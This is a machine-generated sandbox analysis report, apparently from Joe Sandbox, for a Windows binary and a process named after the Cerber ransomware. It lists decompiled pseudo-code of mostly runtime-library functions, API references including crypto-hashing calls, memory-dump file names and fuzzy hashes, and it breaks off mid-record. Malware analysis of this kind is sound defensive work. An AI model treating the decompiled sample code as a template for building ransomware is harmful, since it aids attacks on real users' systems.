0x7ff7cef24206
0x7ff7cef2420c
0x7ff7cef24216
0x7ff7cef2421d
0x7ff7cef24229
0x7ff7cef24231
0x7ff7cef2423b
0x7ff7cef24240
0x7ff7cef24248
0x7ff7cef2424e
0x7ff7cef24250
0x7ff7cef24254
0x7ff7cef2425b
0x7ff7cef24261
0x7ff7cef2426e
0x7ff7cef24273
0x7ff7cef24275
0x7ff7cef2428c
0x7ff7cef24293
0x7ff7cef2429f
0x7ff7cef242a4
0x7ff7cef242b3
0x7ff7cef242ba
0x7ff7cef242d5

APIs

Part of subcall function 00007FF7CEF24130: _getptd.LIBCMT ref: 00007FF7CEF24142

_errno.LIBCMT ref: 00007FF7CEF24201
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7CEF2420C

Part of subcall function 00007FF7CEF25460: iswctype.LIBCMT ref: 00007FF7CEF254CD

Strings

Z, xrefs: 00007FF7CEF2424A
A, xrefs: 00007FF7CEF24244

Memory Dump Source

Source File: 0000001B.00000002.305308506.00007FF7CEF21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7CEF20000, based on PE: true

Associated: 0000001B.00000002.305279026.00007FF7CEF20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000001B.00000002.305517849.00007FF7CEF2A000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000001B.00000002.305601128.00007FF7CEF2E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000001B.00000002.305780374.00007FF7CEF31000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff7cef20000_5753.jbxd

Yara matches

Similarity

API ID: _errno_getptd_invalid_parameter_noinfoiswctype
String ID: A$Z
API String ID: 3686281101-4098844585
Opcode ID: 7471cf975a6c2e899fc60685f9a1016f05e03f026487ea75407b715c0f360e66
Instruction ID: 7b8fac91f68cbb853b3718b473ceb30c1de0a1b0072b4b28b8b238d81e8b8932
Opcode Fuzzy Hash: 7471cf975a6c2e899fc60685f9a1016f05e03f026487ea75407b715c0f360e66
Instruction Fuzzy Hash: 222186A2E186D281EBA17F16A14017DF6A0EB90BB0FD84131EADD277D5CF6CD8418721

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7CEF2224C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 33%

			E00007FF77FF7CEF2224C(long long __rbx, void* __rcx, long long __rdx, long long __rsi, void* _a8, void* _a16) {
				char _v24;
				intOrPtr _v40;
				WCHAR* _v56;
				WCHAR* _t36;
				WCHAR* _t46;
				void* _t51;
				long long _t54;
				void* _t55;

				_t55 = _t51;
				 *((long long*)(_t55 + 8)) = __rbx;
				 *((long long*)(_t55 + 0x10)) = __rsi;
				 *((long long*)(_t55 - 0x30)) = _t55 - 0x28;
				_t36 =  *(__rcx + 8);
				_v40 = 0;
				 *(_t55 - 0x20) = _t46;
				 *(_t55 - 0x38) = _t46;
				 *((long long*)(_t55 - 0x10)) = __rdx;
				 *(_t55 - 0x18) = _t36;
				 *(__rcx + 8) = _t46;
				if (_t36 == 0) goto 0xcef222dc;
				if ( *(__rcx + 2) == 0) goto 0xcef222dc;
				GetModuleHandleW(_t46);
				GetProcAddress(??, ??);
				 *_t36();
				_v56 = _t36;
				if (_t36 == 0) goto 0xcef222dc;
				r8d =  *(__rcx + 2) & 0x0000ffff;
				 *(__rcx + 8) = _t36;
				return E00007FF77FF7CEF21170(__rbx,  &_v56,  &_v24, _t54);
			}

0x7ff7cef2224c
0x7ff7cef2224f
0x7ff7cef22253
0x7ff7cef22265
0x7ff7cef22269
0x7ff7cef2226d
0x7ff7cef22271
0x7ff7cef22275
0x7ff7cef22279
0x7ff7cef2227d
0x7ff7cef22281
0x7ff7cef22288
0x7ff7cef2228e
0x7ff7cef2229b
0x7ff7cef222ab
0x7ff7cef222b6
0x7ff7cef222b8
0x7ff7cef222c0
0x7ff7cef222c2
0x7ff7cef222d1
0x7ff7cef222ed

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF7CEF2229B
GetProcAddress.KERNEL32 ref: 00007FF7CEF222AB

Part of subcall function 00007FF7CEF21170: SetFilePointer.KERNEL32 ref: 00007FF7CEF211D9
Part of subcall function 00007FF7CEF21170: GetModuleHandleW.KERNEL32 ref: 00007FF7CEF211F6
Part of subcall function 00007FF7CEF21170: GetProcAddress.KERNEL32 ref: 00007FF7CEF21206

Strings

LocalAlloc, xrefs: 00007FF7CEF222A1
kernel32, xrefs: 00007FF7CEF22294

Memory Dump Source

Source File: 0000001B.00000002.305308506.00007FF7CEF21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7CEF20000, based on PE: true

Associated: 0000001B.00000002.305279026.00007FF7CEF20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000001B.00000002.305517849.00007FF7CEF2A000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000001B.00000002.305601128.00007FF7CEF2E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000001B.00000002.305780374.00007FF7CEF31000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff7cef20000_5753.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc$FilePointer
String ID: LocalAlloc$kernel32
API String ID: 566066777-3502785670
Opcode ID: b8c64fe991d167cb7dc6692ddd56d779f6955ba88ef4e3839f646d29b8748e60
Instruction ID: 548396f81b1c77e988e94800fba0207d7f49cf2da5fb46be246f28b0bd6c08a5
Opcode Fuzzy Hash: b8c64fe991d167cb7dc6692ddd56d779f6955ba88ef4e3839f646d29b8748e60
Instruction Fuzzy Hash: 58118C32B09B4682EB50DF04F88406DB3F5FB88B94B558235DA9C43764EF3AE996C710

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7CEF23A80 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 28
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E00007FF77FF7CEF23A80(long long* __rax, long long __rbx, signed short* __rcx, long long _a8) {
				void* _t30;

				_a8 = __rbx;
				if (__rcx == 0) goto 0xcef23ad7;
				GetModuleHandleW(??);
				GetProcAddress(??, ??);
				 *__rax();
				if (__rax == 0) goto 0xcef23ad7;
				r8d =  *__rcx & 0x0000ffff;
				return E00007FF77FF7CEF27640(0x40, __rax, __rax, __rcx[4], _t30);
			}

0x7ff7cef23a80
0x7ff7cef23a92
0x7ff7cef23a9e
0x7ff7cef23aae
0x7ff7cef23abd
0x7ff7cef23ac5
0x7ff7cef23ac7
0x7ff7cef23ae4

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF7CEF23A9E
GetProcAddress.KERNEL32 ref: 00007FF7CEF23AAE

Strings

LocalAlloc, xrefs: 00007FF7CEF23AA4
kernel32, xrefs: 00007FF7CEF23A97

Memory Dump Source

Source File: 0000001B.00000002.305308506.00007FF7CEF21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7CEF20000, based on PE: true

Associated: 0000001B.00000002.305279026.00007FF7CEF20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000001B.00000002.305517849.00007FF7CEF2A000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000001B.00000002.305601128.00007FF7CEF2E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000001B.00000002.305780374.00007FF7CEF31000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff7cef20000_5753.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: LocalAlloc$kernel32
API String ID: 1646373207-3502785670
Opcode ID: 768c83978b35878a8f958784c4e0d899e0f3712db5d3c7c46bf7aa8f2928ed0d
Instruction ID: 239d83350b7611321ab17779d5e7fcce7056d2b1c07ff7d4f0537ab9dc97f3c3
Opcode Fuzzy Hash: 768c83978b35878a8f958784c4e0d899e0f3712db5d3c7c46bf7aa8f2928ed0d
Instruction Fuzzy Hash: 3AF05455B05A4781EE88EF96E451435A360EF48BA4F885035CB0D17754EF3DE498C720

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7CEF25814 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(?,?,000000FF,00007FF7CEF2585D,?,?,00000028,00007FF7CEF28D1D,?,?,00000000,00007FF7CEF274D0,?,?,?,00007FF7CEF27395), ref: 00007FF7CEF25823
GetProcAddress.KERNEL32(?,?,000000FF,00007FF7CEF2585D,?,?,00000028,00007FF7CEF28D1D,?,?,00000000,00007FF7CEF274D0,?,?,?,00007FF7CEF27395), ref: 00007FF7CEF25838

Strings

CorExitProcess, xrefs: 00007FF7CEF2582E
mscoree.dll, xrefs: 00007FF7CEF2581C

Memory Dump Source

Source File: 0000001B.00000002.305308506.00007FF7CEF21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7CEF20000, based on PE: true

Associated: 0000001B.00000002.305279026.00007FF7CEF20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000001B.00000002.305517849.00007FF7CEF2A000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000001B.00000002.305601128.00007FF7CEF2E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000001B.00000002.305780374.00007FF7CEF31000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff7cef20000_5753.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 1646373207-1276376045
Opcode ID: 2e7156098e7d4b22c2cdf77a18da4477a529ad48e7687adc2817a342e21d314d
Instruction ID: f0ca846fabe142f505f240b8bb7104003164884a95d27e1a808932c83ea13fde
Opcode Fuzzy Hash: 2e7156098e7d4b22c2cdf77a18da4477a529ad48e7687adc2817a342e21d314d
Instruction Fuzzy Hash: 5FE01210F19B0242FE99BF60B8845745370AF88720BCD1038C81E55390EF6CA58EC724

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7CEF2834C Relevance: 6.2, APIs: 4, Instructions: 159
COMMON

Download Yara Rule

C-Code - Quality: 33%

			E00007FF77FF7CEF2834C(void* __ecx, void* __eflags, long* __rax, long long __rbx, void* __rdx, long long __rsi, intOrPtr _a8, long long _a16, long long _a24) {
				signed long long _v48;
				intOrPtr _v56;
				intOrPtr _t38;
				void* _t40;
				void* _t41;
				intOrPtr _t46;
				intOrPtr _t61;
				long* _t89;
				long long* _t95;
				long long _t96;
				intOrPtr _t102;
				void* _t103;
				intOrPtr _t108;
				long* _t110;
				signed long long _t115;
				long long* _t122;
				signed long long _t124;

				_t97 = __rbx;
				_t89 = __rax;
				_a16 = __rbx;
				_a24 = __rsi;
				_t41 = __ecx;
				_a8 = 0;
				if (__eflags == 0) goto 0xcef2843d;
				if (__eflags == 0) goto 0xcef283df;
				if (__eflags == 0) goto 0xcef283cf;
				if (__eflags == 0) goto 0xcef283df;
				if (__eflags == 0) goto 0xcef283df;
				if (__eflags == 0) goto 0xcef283bf;
				if (__eflags == 0) goto 0xcef283ac;
				if (__eflags == 0) goto 0xcef283cf;
				E00007FF77FF7CEF25798(__eflags, __rax);
				 *((intOrPtr*)(__rax)) = 0x16;
				E00007FF77FF7CEF25730();
				goto 0xcef283ec;
				goto 0xcef2844b;
				goto 0xcef2844b;
				goto 0xcef2844b;
				E00007FF77FF7CEF25200(__rax, __rbx);
				_t110 = _t89;
				if (_t89 != 0) goto 0xcef283f4;
				goto 0xcef28566;
				_t108 =  *((intOrPtr*)(_t89 + 0xa0));
				_t102 = _t108;
				_t115 =  *0xcef2b32c;
				if ( *((intOrPtr*)(_t102 + 4)) == _t41) goto 0xcef2841d;
				_t103 = _t102 + 0x10;
				if (_t103 - (_t115 << 4) + _t108 < 0) goto 0xcef28405;
				_t95 = (_t115 << 4) + _t108;
				if (_t103 - _t95 >= 0) goto 0xcef28431;
				if ( *((intOrPtr*)(_t103 + 4)) == _t41) goto 0xcef28433;
				goto 0xcef2845d;
				_a8 = 1;
				__imp__DecodePointer();
				_t122 = _t95;
				if (_t122 != 1) goto 0xcef2846a;
				goto 0xcef28566;
				if (_t122 != 0) goto 0xcef28479;
				E00007FF77FF7CEF25B80(_t97, _t108, _t115);
				asm("int3");
				if (1 == 0) goto 0xcef28485;
				E00007FF77FF7CEF2741C();
				if (_t41 == 8) goto 0xcef2849b;
				if (_t41 == 0xb) goto 0xcef2849b;
				if (_t41 == 4) goto 0xcef2849b;
				goto 0xcef284c7;
				_t124 =  *(_t110 + 0xa8);
				_v48 = _t124;
				 *(_t110 + 0xa8) =  *(_t110 + 0xa8) & 0x00000000;
				if (_t41 != 8) goto 0xcef284c7;
				r14d =  *((intOrPtr*)(_t110 + 0xb0));
				 *((intOrPtr*)(_t110 + 0xb0)) = 0x8c;
				goto 0xcef284cc;
				r14d = _a8;
				if (_t41 != 8) goto 0xcef2850a;
				_t46 =  *0xcef2b320; // 0x3
				_t61 = _t46;
				_v56 = _t46;
				_t38 =  *0xcef2b324; // 0x9
				if (_t61 - _t46 + _t38 >= 0) goto 0xcef28513;
				_t96 =  *((intOrPtr*)(_t110 + 0xa0));
				 *(_t96 + 8 + (_t61 + _t61) * 8) =  *(_t96 + 8 + (_t61 + _t61) * 8) & 0x00000000;
				_v56 = _t61 + 1;
				goto 0xcef284dd;
				E00007FF77FF7CEF25114();
				 *0xcef30038 = _t96;
				if (1 == 0) goto 0xcef2851e;
				E00007FF77FF7CEF2731C();
				if (_t41 != 8) goto 0xcef28534;
				 *_t122();
				goto 0xcef28539;
				_t40 =  *_t122();
				if (_t41 == 8) goto 0xcef2854b;
				if (_t41 == 0xb) goto 0xcef2854b;
				if (_t41 != 4) goto 0xcef28463;
				 *(_t110 + 0xa8) = _t124;
				if (_t41 != 8) goto 0xcef28463;
				 *((intOrPtr*)(_t110 + 0xb0)) = r14d;
				goto 0xcef28463;
				return _t40;
			}

0x7ff7cef2834c
0x7ff7cef2834c
0x7ff7cef2834c
0x7ff7cef28351
0x7ff7cef28363
0x7ff7cef28367
0x7ff7cef28372
0x7ff7cef2837b
0x7ff7cef28380
0x7ff7cef28385
0x7ff7cef2838a
0x7ff7cef2838f
0x7ff7cef28394
0x7ff7cef28398
0x7ff7cef2839a
0x7ff7cef2839f
0x7ff7cef283a5
0x7ff7cef283aa
0x7ff7cef283ba
0x7ff7cef283cd
0x7ff7cef283dd
0x7ff7cef283df
0x7ff7cef283e4
0x7ff7cef283ea
0x7ff7cef283ef
0x7ff7cef283f4
0x7ff7cef283fb
0x7ff7cef283fe
0x7ff7cef28408
0x7ff7cef2840a
0x7ff7cef2841b
0x7ff7cef28424
0x7ff7cef2842a
0x7ff7cef2842f
0x7ff7cef2843b
0x7ff7cef28450
0x7ff7cef28454
0x7ff7cef2845a
0x7ff7cef28461
0x7ff7cef28465
0x7ff7cef2846d
0x7ff7cef28473
0x7ff7cef28478
0x7ff7cef2847b
0x7ff7cef2847f
0x7ff7cef28488
0x7ff7cef2848d
0x7ff7cef28492
0x7ff7cef28499
0x7ff7cef2849b
0x7ff7cef284a2
0x7ff7cef284a7
0x7ff7cef284b2
0x7ff7cef284b4
0x7ff7cef284bb
0x7ff7cef284c5
0x7ff7cef284c7
0x7ff7cef284cf
0x7ff7cef284d1
0x7ff7cef284d7
0x7ff7cef284d9
0x7ff7cef284dd
0x7ff7cef284e7
0x7ff7cef284ef
0x7ff7cef284f6
0x7ff7cef284fe
0x7ff7cef28508
0x7ff7cef2850a
0x7ff7cef2850f
0x7ff7cef28515
0x7ff7cef28519
0x7ff7cef28525
0x7ff7cef2852f
0x7ff7cef28532
0x7ff7cef28536
0x7ff7cef2853b
0x7ff7cef28540
0x7ff7cef28545
0x7ff7cef2854b
0x7ff7cef28554
0x7ff7cef2855a
0x7ff7cef28561
0x7ff7cef2857d

APIs

_errno.LIBCMT ref: 00007FF7CEF2839A
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7CEF283A5
DecodePointer.KERNEL32(?,?,?,?,?,00007FF7CEF290E4,?,?,?,?,00007FF7CEF282F6,?,?,?,?,00007FF7CEF257F1), ref: 00007FF7CEF28454
_lock.LIBCMT ref: 00007FF7CEF2847F

Memory Dump Source

Source File: 0000001B.00000002.305308506.00007FF7CEF21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7CEF20000, based on PE: true

Associated: 0000001B.00000002.305279026.00007FF7CEF20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000001B.00000002.305517849.00007FF7CEF2A000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000001B.00000002.305601128.00007FF7CEF2E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000001B.00000002.305780374.00007FF7CEF31000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff7cef20000_5753.jbxd

Yara matches

Similarity

API ID: DecodePointer_errno_invalid_parameter_noinfo_lock
String ID:
API String ID: 27599310-0
Opcode ID: adf8396a3541b27ccf66cf7ef570de70f0f465a497b8ff800b747b885a353d70
Instruction ID: 59cdfaaa10d1aafec1bab6e228c1a60305cccebf25285475b4057946ee8abf45
Opcode Fuzzy Hash: adf8396a3541b27ccf66cf7ef570de70f0f465a497b8ff800b747b885a353d70
Instruction Fuzzy Hash: D1518332E0C68A87FAE5EF14A44123AE691EF84774FD48435D95E63694CF3CF845C621

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7CEF26FF4 Relevance: 6.1, APIs: 4, Instructions: 102
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 28%

			E00007FF77FF7CEF26FF4(signed int __edx, long long __rbx, intOrPtr* __rcx, void* __rdx, long long __rdi, long long __rsi, void* __r8) {
				int _t23;
				void* _t26;
				int _t28;
				int _t46;
				signed long long _t56;
				intOrPtr* _t64;
				void* _t70;
				signed long long _t81;
				void* _t82;
				void* _t83;
				void* _t84;
				void* _t91;
				void* _t92;
				int _t93;

				_t83 = _t82 - 0x40;
				_t81 = _t83 + 0x30;
				 *((long long*)(_t81 + 0x40)) = __rbx;
				 *((long long*)(_t81 + 0x48)) = __rsi;
				 *((long long*)(_t81 + 0x50)) = __rdi;
				_t56 =  *0xcef2eb60; // 0xd44e0b4a63bf
				 *_t81 = _t56 ^ _t81;
				r13d = r9d;
				r15d = __edx;
				if ( *((intOrPtr*)(_t81 + 0x68)) != 0) goto 0xcef27039;
				 *(_t81 + 0x70) =  ~( *(_t81 + 0x70));
				 *((intOrPtr*)(_t83 + 0x28)) = 0;
				asm("sbb edx, edx");
				 *((long long*)(_t83 + 0x20)) = __rdi;
				_t23 = MultiByteToWideChar(??, ??, ??, ??, ??, ??);
				_t93 = _t23;
				_t46 = _t23;
				if (_t46 != 0) goto 0xcef27062;
				goto 0xcef2712c;
				if (_t46 <= 0) goto 0xcef270cb;
				if (_t93 - 0xfffffff0 > 0) goto 0xcef270cb;
				_t70 = _t93 + _t93 + 0x10;
				if (_t70 - 0x400 > 0) goto 0xcef270b2;
				if (_t70 + 0xf - _t70 > 0) goto 0xcef27094;
				E00007FF77FF7CEF28DA0(0, 0xffffffffffffff0, _t91, _t92);
				_t84 = _t83 - 0xfffffff0;
				_t64 = _t84 + 0x30;
				if (_t64 == 0) goto 0xcef2705b;
				 *_t64 = 0xcccc;
				goto 0xcef270c5;
				_t26 = malloc(??);
				if (0xfffffff0 == 0) goto 0xcef270ce;
				 *((intOrPtr*)(0xffffffffffffff0)) = 0xdddd;
				goto 0xcef270ce;
				_t67 = __rdi;
				if (__rdi == 0) goto 0xcef2705b;
				E00007FF77FF7CEF26B20(_t26,  *((intOrPtr*)( *__rcx + 4)), 0, __rdi, __rdx, _t93 + _t93);
				r9d = r13d;
				 *((intOrPtr*)(_t84 + 0x28)) = r12d;
				 *((long long*)(_t84 + 0x20)) = __rdi;
				_t28 = MultiByteToWideChar(??, ??, ??, ??, ??, ??);
				if (_t28 == 0) goto 0xcef27119;
				r8d = _t28;
				GetStringTypeW(??, ??, ??, ??);
				_t18 = _t67 - 0x10; // -16
				if ( *_t18 != 0xdddd) goto 0xcef2712a;
				E00007FF77FF7CEF27460(0xffffffffffffff0, _t18);
				return E00007FF77FF7CEF271F0(r15d, __rdi,  *_t81 ^ _t81, __rdi, __rsi);
			}

0x7ff7cef26ffe
0x7ff7cef27002
0x7ff7cef27007
0x7ff7cef2700b
0x7ff7cef2700f
0x7ff7cef27013
0x7ff7cef2701d
0x7ff7cef27026
0x7ff7cef2702c
0x7ff7cef27031
0x7ff7cef27039
0x7ff7cef2703e
0x7ff7cef27042
0x7ff7cef27044
0x7ff7cef2704e
0x7ff7cef27054
0x7ff7cef27057
0x7ff7cef27059
0x7ff7cef2705d
0x7ff7cef27062
0x7ff7cef27071
0x7ff7cef27073
0x7ff7cef2707f
0x7ff7cef27088
0x7ff7cef27098
0x7ff7cef2709d
0x7ff7cef270a0
0x7ff7cef270a8
0x7ff7cef270aa
0x7ff7cef270b0
0x7ff7cef270b2
0x7ff7cef270bd
0x7ff7cef270bf
0x7ff7cef270c9
0x7ff7cef270cb
0x7ff7cef270d1
0x7ff7cef270de
0x7ff7cef270e3
0x7ff7cef270f0
0x7ff7cef270f5
0x7ff7cef270fa
0x7ff7cef27102
0x7ff7cef27108
0x7ff7cef27111
0x7ff7cef27119
0x7ff7cef27123
0x7ff7cef27125
0x7ff7cef27151

APIs

MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,00007FF7CEF271AF), ref: 00007FF7CEF2704E
malloc.LIBCMT ref: 00007FF7CEF270B2
MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,00007FF7CEF271AF), ref: 00007FF7CEF270FA
GetStringTypeW.KERNEL32(?,?,?,?,?,?,?,00007FF7CEF271AF), ref: 00007FF7CEF27111

Memory Dump Source

Source File: 0000001B.00000002.305308506.00007FF7CEF21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7CEF20000, based on PE: true

Associated: 0000001B.00000002.305279026.00007FF7CEF20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000001B.00000002.305517849.00007FF7CEF2A000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000001B.00000002.305601128.00007FF7CEF2E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000001B.00000002.305780374.00007FF7CEF31000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff7cef20000_5753.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$StringTypemalloc
String ID:
API String ID: 4066956681-0
Opcode ID: 3c67af3a7237179b16aed0a02624798f9160055e14e0f8ff9ff85d4aae7233b0
Instruction ID: c7db00c28cfba8058d9d45403975994c2224984fbbc01b4b5642ecb012a81edb
Opcode Fuzzy Hash: 3c67af3a7237179b16aed0a02624798f9160055e14e0f8ff9ff85d4aae7233b0
Instruction Fuzzy Hash: 32417922A05B8186EB90EF25D800569A3D5FF84BB8F984635EE2D5B7D5DF3DE4058310

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7CEF2509C Relevance: 6.0, APIs: 4, Instructions: 29
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 92%

			E00007FF77FF7CEF2509C(void* __rax) {
				void* __rbx;
				void* _t12;
				void* _t17;
				void* _t21;
				intOrPtr _t24;
				void* _t25;
				intOrPtr _t27;
				void* _t28;
				void* _t29;
				void* _t30;

				_t21 = __rax;
				E00007FF77FF7CEF25284(_t12, _t17, __rax);
				if (( *0xcef2e540 &  *(_t21 + 0xc8)) == 0) goto 0xcef250d0;
				if ( *((long long*)(_t21 + 0xc0)) == 0) goto 0xcef250d0;
				E00007FF77FF7CEF25284( *(_t21 + 0xc8),  *((long long*)(_t21 + 0xc0)), _t21);
				_t24 =  *((intOrPtr*)(_t21 + 0xc0));
				goto 0xcef250fb;
				E00007FF77FF7CEF2741C();
				_t6 = _t24 + 0xc0; // 0xc0
				_t27 =  *0xcef2e970; // 0x7ff7cef2e810
				E00007FF77FF7CEF25044(_t21, _t6, _t27, _t28, _t29, _t30);
				_t25 = _t21;
				E00007FF77FF7CEF2731C();
				if (_t25 != 0) goto 0xcef25108;
				_t7 = _t25 + 0x20; // 0x20
				return E00007FF77FF7CEF25BAC(_t7, _t25, _t30);
			}

0x7ff7cef2509c
0x7ff7cef250a2
0x7ff7cef250b6
0x7ff7cef250c0
0x7ff7cef250c2
0x7ff7cef250c7
0x7ff7cef250ce
0x7ff7cef250d5
0x7ff7cef250db
0x7ff7cef250e2
0x7ff7cef250e9
0x7ff7cef250ee
0x7ff7cef250f6
0x7ff7cef250fe
0x7ff7cef25100
0x7ff7cef25110

APIs

_getptd.LIBCMT ref: 00007FF7CEF250A2

Part of subcall function 00007FF7CEF25284: _amsg_exit.LIBCMT ref: 00007FF7CEF2529A

_getptd.LIBCMT ref: 00007FF7CEF250C2
_lock.LIBCMT ref: 00007FF7CEF250D5
_amsg_exit.LIBCMT ref: 00007FF7CEF25103

Memory Dump Source

Source File: 0000001B.00000002.305308506.00007FF7CEF21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7CEF20000, based on PE: true

Associated: 0000001B.00000002.305279026.00007FF7CEF20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000001B.00000002.305517849.00007FF7CEF2A000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000001B.00000002.305601128.00007FF7CEF2E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000001B.00000002.305780374.00007FF7CEF31000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff7cef20000_5753.jbxd

Yara matches

Similarity

API ID: _amsg_exit_getptd$_lock
String ID:
API String ID: 3670291111-0
Opcode ID: 01117153be94f76d20bd6ef527d8a73ab58fc85a1a2034cd2b91cda1fd46b9a7
Instruction ID: a6cfe694941e875e72ff196dfa1425f8182a23f238f35bb7f5e426f42fbb94c9
Opcode Fuzzy Hash: 01117153be94f76d20bd6ef527d8a73ab58fc85a1a2034cd2b91cda1fd46b9a7
Instruction Fuzzy Hash: 67F01211A0A14286FAD6BFA18C517B89251EF84764F984135DA0D6F3D2EF1CA844D372

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: Endermanch@Cerber5.exePID: 3592, Parent PID: 3220COMMON

Executed Functions

Function 0040AD86 Relevance: 6.0, APIs: 4, Instructions: 42
encryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040AD62: CryptAcquireContextW.ADVAPI32(0042FAF0,00000000,00000000,00000001,F0000000,0040AD93,?,?,?,?,00402E97,00402F19,00000000,?,00000000), ref: 0040AD7A

CryptCreateHash.ADVAPI32(00008003,00000000,00000000,00000000,?,?,?,?,00402E97,00402F19,00000000,?,00000000), ref: 0040ADAB
CryptHashData.ADVAPI32(00000000,?,00000000,00000000,?,?,?,?,00402E97,00402F19,00000000,?,00000000), ref: 0040ADBF
CryptGetHashParam.ADVAPI32(00000000,00000002,00402F19,?,00000000,?,?,?,?,00402E97,00402F19,00000000), ref: 0040ADDD
CryptDestroyHash.ADVAPI32(00000000,?,?,?,?,00402E97,00402F19,00000000,?,00000000), ref: 0040ADEB

Memory Dump Source

Source File: 00000028.00000002.317439336.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000028.00000002.318646464.000000000042F000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.318706779.0000000000432000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_400000_Endermanch@Cerber5.jbxd

Yara matches

Similarity

API ID: Crypt$Hash$AcquireContextCreateDataDestroyParam
String ID:
API String ID: 1643522540-0
Opcode ID: 22e3fde35bc06fe7a1d3690271d50f937b631542d947ca3b8de1cc307d06c3d6
Instruction ID: e707437ec58a6c757e266905c9f68223cccbec67ed6f77b66ad84f0330a91ceb
Opcode Fuzzy Hash: 22e3fde35bc06fe7a1d3690271d50f937b631542d947ca3b8de1cc307d06c3d6
Instruction Fuzzy Hash: 41014671600308BFEF218FA1DD8AA9E7B7EEF04341F008035B901A19A0D7718E64AA24

Uniqueness

Uniqueness Score: -1.00%

Function 0040AD62 Relevance: 1.5, APIs: 1, Instructions: 11
encryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CryptAcquireContextW.ADVAPI32(0042FAF0,00000000,00000000,00000001,F0000000,0040AD93,?,?,?,?,00402E97,00402F19,00000000,?,00000000), ref: 0040AD7A

Memory Dump Source

Source File: 00000028.00000002.317439336.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000028.00000002.318646464.000000000042F000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.318706779.0000000000432000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_400000_Endermanch@Cerber5.jbxd

Yara matches

Similarity

API ID: AcquireContextCrypt
String ID:
API String ID: 3951991833-0
Opcode ID: 1b3fc643ef2366b6010b80a73a582ea71f5e7443e240881e435b80748d053974
Instruction ID: 71168021d763e1e7dcbc7070406abf6f585069e42b9707890cf07a7ddbdd7918
